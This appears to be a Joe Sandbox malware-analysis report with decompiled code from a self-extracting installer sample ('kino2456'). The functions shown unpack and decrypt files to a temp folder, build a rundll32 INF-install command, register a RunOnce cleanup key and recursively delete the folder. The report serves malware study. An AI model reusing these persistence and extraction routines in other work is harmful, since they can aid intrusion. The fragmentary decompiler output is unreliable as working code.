                                                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                                                    									E00961A84( &_v1556, "]");
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                                                    									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E009644B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x969120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x961140, _t156, 8,  &_v268) == 0) {
										 *0x969a34 =  *0x969a34 & 0xfffffffb;
										if( *0x969a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0096171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x969a34 =  *0x969a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00961680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00961680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00966CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}
                                                                                                                                                                                                                                    0x00961dd2
                                                                                                                                                                                                                                    0x00961bf7
                                                                                                                                                                                                                                    0x00961bfe
                                                                                                                                                                                                                                    0x00961c07
                                                                                                                                                                                                                                    0x00961d55
                                                                                                                                                                                                                                    0x00961d5a
                                                                                                                                                                                                                                    0x00961d5b
                                                                                                                                                                                                                                    0x00961d5d
                                                                                                                                                                                                                                    0x00961d5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961c1b
                                                                                                                                                                                                                                    0x00961c1b
                                                                                                                                                                                                                                    0x00961c20
                                                                                                                                                                                                                                    0x00961c2c
                                                                                                                                                                                                                                    0x00961c33
                                                                                                                                                                                                                                    0x00961c38
                                                                                                                                                                                                                                    0x00961c3a
                                                                                                                                                                                                                                    0x00961c3a
                                                                                                                                                                                                                                    0x00961c40
                                                                                                                                                                                                                                    0x00961c4b
                                                                                                                                                                                                                                    0x00961c4b
                                                                                                                                                                                                                                    0x00961c5d
                                                                                                                                                                                                                                    0x00961c61
                                                                                                                                                                                                                                    0x00961dd4
                                                                                                                                                                                                                                    0x00961dd4
                                                                                                                                                                                                                                    0x00961dd6
                                                                                                                                                                                                                                    0x00961ddb
                                                                                                                                                                                                                                    0x00961ddc
                                                                                                                                                                                                                                    0x00961dde
                                                                                                                                                                                                                                    0x00961d64
                                                                                                                                                                                                                                    0x00961d64
                                                                                                                                                                                                                                    0x00961d67
                                                                                                                                                                                                                                    0x00961d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00961c67
                                                                                                                                                                                                                                    0x00961c67
                                                                                                                                                                                                                                    0x00961c6d
                                                                                                                                                                                                                                    0x00961c72
                                                                                                                                                                                                                                    0x00961c74
                                                                                                                                                                                                                                    0x00961c74
                                                                                                                                                                                                                                    0x00961c8e
                                                                                                                                                                                                                                    0x00961c99
                                                                                                                                                                                                                                    0x00961cc0
                                                                                                                                                                                                                                    0x00961cf8
                                                                                                                                                                                                                                    0x00961d07
                                                                                                                                                                                                                                    0x00961d23
                                                                                                                                                                                                                                    0x00961d09
                                                                                                                                                                                                                                    0x00961d14
                                                                                                                                                                                                                                    0x00961d1b
                                                                                                                                                                                                                                    0x00961d1b
                                                                                                                                                                                                                                    0x00961d2b
                                                                                                                                                                                                                                    0x00961d2d
                                                                                                                                                                                                                                    0x00961d2d
                                                                                                                                                                                                                                    0x00961d38
                                                                                                                                                                                                                                    0x00961d39
                                                                                                                                                                                                                                    0x00961d46
                                                                                                                                                                                                                                    0x00961cc2
                                                                                                                                                                                                                                    0x00961cc2
                                                                                                                                                                                                                                    0x00961ccc
                                                                                                                                                                                                                                    0x00961cce
                                                                                                                                                                                                                                    0x00961cce
                                                                                                                                                                                                                                    0x00961cdb
                                                                                                                                                                                                                                    0x00961ce6
                                                                                                                                                                                                                                    0x00961cee
                                                                                                                                                                                                                                    0x00961cee
                                                                                                                                                                                                                                    0x00961e89
                                                                                                                                                                                                                                    0x00961e91
                                                                                                                                                                                                                                    0x00961e92
                                                                                                                                                                                                                                    0x00961e94
                                                                                                                                                                                                                                    0x00961e97
                                                                                                                                                                                                                                    0x00961ea4
                                                                                                                                                                                                                                    0x00961ea4
                                                                                                                                                                                                                                    0x00961c61
                                                                                                                                                                                                                                    0x00961c07
                                                                                                                                                                                                                                    0x00961bd3
                                                                                                                                                                                                                                    0x00961b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00961C57
• GetPrivateProfileIntA.KERNEL32 ref: 00961C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00961140,00000000,00000008,?), ref: 00961CB8
• GetShortPathNameA.KERNEL32 ref: 00961D1B
  • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
  • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
• String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
• API String ID: 383838535-2112662285
• Opcode ID: 9ce3cb5805c69d3706e461401140c1662a145bd9e0e44ac4bde2c1adfc2aae5c
• Instruction ID: 605ad669d2f943ae4d9f808b344d91f39766ba106d431dc12a34c9cb5c6b7caa
• Opcode Fuzzy Hash: 9ce3cb5805c69d3706e461401140c1662a145bd9e0e44ac4bde2c1adfc2aae5c
• Instruction Fuzzy Hash: 27A169B0A082186BEB30DB24CC45FEA77ADDB92314F1C0699F595E32D0DBB59E85CB50
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 406 962f1d-962f3d 407 962f3f-962f46 406->407 408 962f6c-962f73 call 965164 406->408 409 962f5f-962f66 call 963a3f 407->409 410 962f48 call 9651e5 407->410 415 963041 408->415 416 962f79-962f80 call 9655a0 408->416 409->408 409->415 417 962f4d-962f4f 410->417 420 963043-963053 call 966ce0 415->420 416->415 424 962f86-962fbe GetSystemDirectoryA call 96658a LoadLibraryA 416->424 417->415 421 962f55-962f5d 417->421 421->408 421->409 428 962ff7-963004 FreeLibrary 424->428 429 962fc0-962fd4 GetProcAddress 424->429 431 963006-96300c 428->431 432 963017-963024 SetCurrentDirectoryA 428->432 429->428 430 962fd6-962fee DecryptFileA 429->430 430->428 442 962ff0-962ff5 430->442 431->432 435 96300e call 96621e 431->435 433 963026-96303c call 9644b9 call 966285 432->433 434 963054-96305a 432->434 433->415 438 963065-96306c 434->438 439 96305c call 963b26 434->439 446 963013-963015 435->446 444 96306e-963075 call 96256d 438->444 445 96307c-963089 438->445 451 963061-963063 439->451 442->428 452 96307a 444->452 448 9630a1-9630a9 445->448 449 96308b-963091 445->449 446->415 446->432 455 9630b4-9630b7 448->455 456 9630ab-9630ad 448->456 449->448 453 963093 call 963ba2 449->453 451->415 451->438 452->445 459 963098-96309a 453->459 455->420 456->455 458 9630af call 964169 456->458 458->455 459->415 461 96309c 459->461 461->448
C-Code - Quality: 82%
			E00962F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				signed int _t27;
                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                    				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                                                    				int _t47;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t43 = __edx;
                                                                                                                                                                                                                                    				_t9 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                    				if( *0x968a38 != 0) {
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					_t11 = E00965164(_t52);
                                                                                                                                                                                                                                    					_t53 = _t11;
                                                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						_t12 = 0;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						return E00966CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t14 = E009655A0(_t53); // executed
                                                                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t45 = 0x105;
                                                                                                                                                                                                                                    						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                    						_t43 = 0x105;
                                                                                                                                                                                                                                    						_t40 =  &_v272;
                                                                                                                                                                                                                                    						E0096658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                    						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                    						_t44 = 0;
                                                                                                                                                                                                                                    						if(_t36 != 0) {
                                                                                                                                                                                                                                    							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                    							_v276 = _t31;
                                                                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                                                                    								_t45 = _t47;
                                                                                                                                                                                                                                    								_t40 = _t31;
                                                                                                                                                                                                                                    								 *0x96a288("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\", 0); // executed
                                                                                                                                                                                                                                    								_v276();
                                                                                                                                                                                                                                    								if(_t47 != _t47) {
                                                                                                                                                                                                                                    									_t40 = 4;
                                                                                                                                                                                                                                    									asm("int 0x29");
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						FreeLibrary(_t36);
                                                                                                                                                                                                                                    						_t58 =  *0x968a24 - _t44; // 0x0
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\"); // executed
                                                                                                                                                                                                                                    							if(_t21 != 0) {
                                                                                                                                                                                                                                    								__eflags =  *0x968a2c - _t44; // 0x0
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									L20:
                                                                                                                                                                                                                                    									__eflags =  *0x968d48 & 0x000000c0;
                                                                                                                                                                                                                                    									if(( *0x968d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                    										_t41 =  *0x969a40; // 0x3, executed
                                                                                                                                                                                                                                    										_t26 = E0096256D(_t41); // executed
                                                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t22 =  *0x968a24; // 0x0
                                                                                                                                                                                                                                    									 *0x969a44 = _t44;
                                                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                                                    										__eflags =  *0x968a38;
                                                                                                                                                                                                                                    										if( *0x968a38 == 0) {
                                                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												E00964169(__eflags);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags =  *0x969a30 - _t22; // 0x0
                                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t25 = E00963BA2(); // executed
                                                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t22 =  *0x968a24; // 0x0
                                                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t27 = E00963B26(_t40, _t44);
                                                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                                                    							E009644B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                    							 *0x969124 = E00966285();
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						}
						_t59 =  *0x969a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0096621E(); // executed
						if(_t30 == 0) {
							goto L16; // zero result from E0096621E branches to L16, like the other checks below
						}
						goto L14;
					}
				}
				_t49 =  *0x968a24;
				if( *0x968a24 != 0) { // 0x968a24 already non-zero: go straight to E00963A3F (L4)
					L4:
					_t34 = E00963A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E009651E5(_t49) == 0) { // otherwise call E009651E5 first; zero result branches to L16
					goto L16;
				}
				_t51 =  *0x968a38;
				if( *0x968a38 != 0) { // 0x968a38 non-zero: skip E00963A3F and continue at L5
					goto L5;
				}
				goto L4;
			}
Instruction address column (0x00962f1d to 0x009630b6) that extraction detached from its decompiled lines.

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00962F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00962FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00962FC6
• DecryptFileA.ADVAPI32 ref: 00962FE6
• FreeLibrary.KERNEL32(00000000), ref: 00962FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 0096301C
  • Part of subcall function 009651E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00962F4D,?,00000002,00000000), ref: 00965201
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DecryptFileA$advapi32.dll
• API String ID: 2126469477-1002207402
• Opcode ID: 1b2f63dc2a77d5b5ba742c9f217493770f80810443e8aec4f5ffab71e5066996
• Instruction ID: 2bcd7b837847c2f46c4364cdb9f4db958176c8f7421eac14e5282d4c26f95f9b
• Opcode Fuzzy Hash: 1b2f63dc2a77d5b5ba742c9f217493770f80810443e8aec4f5ffab71e5066996
• Instruction Fuzzy Hash: CE411A30A246059BDB30ABB19D5576733FCDB95750F10812EED41D2192EFB4CE88EB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
E00962390(CHAR* __ecx) {
	signed int _v8;
	char _v276;
	char _v280;
	char _v284;
	struct _WIN32_FIND_DATAA _v596;
	struct _WIN32_FIND_DATAA _v604;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t21;
	int _t36;
	void* _t46;
	void* _t62;
	void* _t63;
	CHAR* _t65;
	void* _t66;
	signed int _t67;
	signed int _t69;

	_t69 = (_t67 & 0xfffffff8) - 0x254;
	_t21 =  *0x968004; // 0xf4cc89a0
	_t22 = _t21 ^ _t69;
	_v8 = _t21 ^ _t69;
	_t65 = __ecx;
	if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
		L10:
		_pop(_t62);
		_pop(_t66);
		_pop(_t46);
		return E00966CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
	} else {
		E00961680( &_v276, 0x104, __ecx);
		_t58 = 0x104;
		E009616B3( &_v280, 0x104, "*");
		_t22 = FindFirstFileA( &_v284,  &_v604); // executed
		_t63 = _t22;
		if(_t63 == 0xffffffff) {
			goto L10;
		} else {
			goto L3;
		}
		do {
			L3:
			_t58 = 0x104;
			E00961680( &_v276, 0x104, _t65);
			if((_v604.ftCreationTime & 0x00000010) == 0) {
				_t58 = 0x104;
				E009616B3( &_v276, 0x104,  &(_v596.dwReserved1));
				SetFileAttributesA( &_v280, 0x80);
				DeleteFileA( &_v280);
			} else {
				if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
					E009616B3( &_v276, 0x104,  &(_v596.cFileName));
					_t58 = 0x104;
					E0096658A( &_v280, 0x104, 0x961140);
					E00962390( &_v284);
				}
			}
			_t36 = FindNextFileA(_t63,  &_v596); // executed
		} while (_t36 != 0);
		FindClose(_t63); // executed
		_t22 = RemoveDirectoryA(_t65); // executed
		goto L10;
	}
}

                                                                                                                                                                                                                                    0x00962495
                                                                                                                                                                                                                                    0x009624a3
                                                                                                                                                                                                                                    0x00962421
                                                                                                                                                                                                                                    0x0096242f
                                                                                                                                                                                                                                    0x00962453
                                                                                                                                                                                                                                    0x0096245d
                                                                                                                                                                                                                                    0x00962466
                                                                                                                                                                                                                                    0x00962472
                                                                                                                                                                                                                                    0x00962472
                                                                                                                                                                                                                                    0x0096242f
                                                                                                                                                                                                                                    0x009624af
                                                                                                                                                                                                                                    0x009624b5
                                                                                                                                                                                                                                    0x009624be
                                                                                                                                                                                                                                    0x009624c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009624c5

APIs
• FindFirstFileA.KERNELBASE(?,00968A3A,009611F4,00968A3A,00000000,?,?), ref: 009623F6
• lstrcmpA.KERNEL32(?,009611F8), ref: 00962427
• lstrcmpA.KERNEL32(?,009611FC), ref: 0096243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00962495
• DeleteFileA.KERNEL32(?), ref: 009624A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 009624AF
• FindClose.KERNELBASE(00000000), ref: 009624BE
• RemoveDirectoryA.KERNELBASE(00968A3A), ref: 009624C5
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: dc4c99106fffbfba0d093302b2ab0276f7fa21125946b31f4422f4cfdc1659f1
• Instruction ID: 4ab539a8864e36842d984bfcf33db646219862921c1956c8b7dd890d76112424
• Opcode Fuzzy Hash: dc4c99106fffbfba0d093302b2ab0276f7fa21125946b31f4422f4cfdc1659f1
• Instruction Fuzzy Hash: 36317531618B40ABC320EB64DC89BEB73ECAFC5315F04492EF59596290EF74994DCB52
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E00962BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	long _t4;
	void* _t6;
	intOrPtr _t7;
	void* _t9;
	struct HINSTANCE__* _t12;
	intOrPtr* _t17;
	signed char _t19;
	intOrPtr* _t21;
	void* _t22;
	void* _t24;
	intOrPtr _t32;

	_t4 = GetVersion();
	if(_t4 >= 0 && _t4 >= 6) {
		_t12 = GetModuleHandleW(L"Kernel32.dll");
		if(_t12 != 0) {
			_t21 = GetProcAddress(_t12, "HeapSetInformation");
			if(_t21 != 0) {
				_t17 = _t21;
				 *0x96a288(0, 1, 0, 0);
				 *_t21();
				_t29 = _t24 - _t24;
				if(_t24 != _t24) {
					_t17 = 4;
					asm("int 0x29");
				}
			}
		}
	}
	_t20 = _a12;
	_t18 = _a4;
	 *0x969124 = 0;
	if(E00962CAA(_a4, _a12, _t29, _t17) != 0) {
		_t9 = E00962F1D(_t18, _t20); // executed
		_t22 = _t9; // executed
		E009652B6(0, _t18, _t21, _t22); // executed
		if(_t22 != 0) {
			_t32 =  *0x968a3a; // 0x0
			if(_t32 == 0) {
				_t19 =  *0x969a2c; // 0x0
				if((_t19 & 0x00000001) != 0) {
					E00961F90(_t19, _t21, _t22);
				}
			}
		}
	}
	_t6 =  *0x968588; // 0x0
	if(_t6 != 0) {
		CloseHandle(_t6);
	}
	_t7 =  *0x969124; // 0x0
	return _t7;
}

                                                                                                                                                                                                                                    0x00962c74
                                                                                                                                                                                                                                    0x00962c76
                                                                                                                                                                                                                                    0x00962c7c
                                                                                                                                                                                                                                    0x00962c7e
                                                                                                                                                                                                                                    0x00962c87
                                                                                                                                                                                                                                    0x00962c89
                                                                                                                                                                                                                                    0x00962c89
                                                                                                                                                                                                                                    0x00962c87
                                                                                                                                                                                                                                    0x00962c7c
                                                                                                                                                                                                                                    0x00962c74
                                                                                                                                                                                                                                    0x00962c8e
                                                                                                                                                                                                                                    0x00962c95
                                                                                                                                                                                                                                    0x00962c98
                                                                                                                                                                                                                                    0x00962c98
                                                                                                                                                                                                                                    0x00962c9e
                                                                                                                                                                                                                                    0x00962ca7

APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00962C28
• CloseHandle.KERNEL32(00000000,?,?,00966BB0,00960000,00000000,00000002,0000000A), ref: 00962C98
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 534fc4d9f5ee343ea3e937723adc7695602e085ba0ba8613ed6d9f14a48b585f
• Instruction ID: 3f65d1220cd3b3391d91e6dbdee6f1c71883c33f69ecf1124f2d30d4ed65352d
• Opcode Fuzzy Hash: 534fc4d9f5ee343ea3e937723adc7695602e085ba0ba8613ed6d9f14a48b585f
• Instruction Fuzzy Hash: E0116B31218B055BCB207BB5AC98B2F3B5DDBC4398B09005DFC80F3250CAB8DC41EAA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00966F40() {

				SetUnhandledExceptionFilter(E00966EF0); // executed
				return 0;
			}




APIs
• SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00966F45
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 56e972c6da9a68cd7661e37d19fbff5e34d34eec019be4f7d283fa5626c0700a
• Instruction ID: 95e46943b64b819f2b1d168ab89eba8b793f09beddb6b7ac466a082ec2a1cb2c
• Opcode Fuzzy Hash: 56e972c6da9a68cd7661e37d19fbff5e34d34eec019be4f7d283fa5626c0700a
• Instruction Fuzzy Hash: 379002642691004797111B749D1941575915A8E606B825464E011D4494DBB194506952
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

C-Code - Quality: 93%
			E0096202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x968004; // 0xf4cc89a0
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00966CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0096171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                    					if(_t41 != 0) {
                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t87 = _t87 + 1;
                                                                                                                                                                                                                                    					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                    					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                    					_t79 = _t84;
                                                                                                                                                                                                                                    					E0096658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                    					_t46 = LoadLibraryA( &_v528); // executed
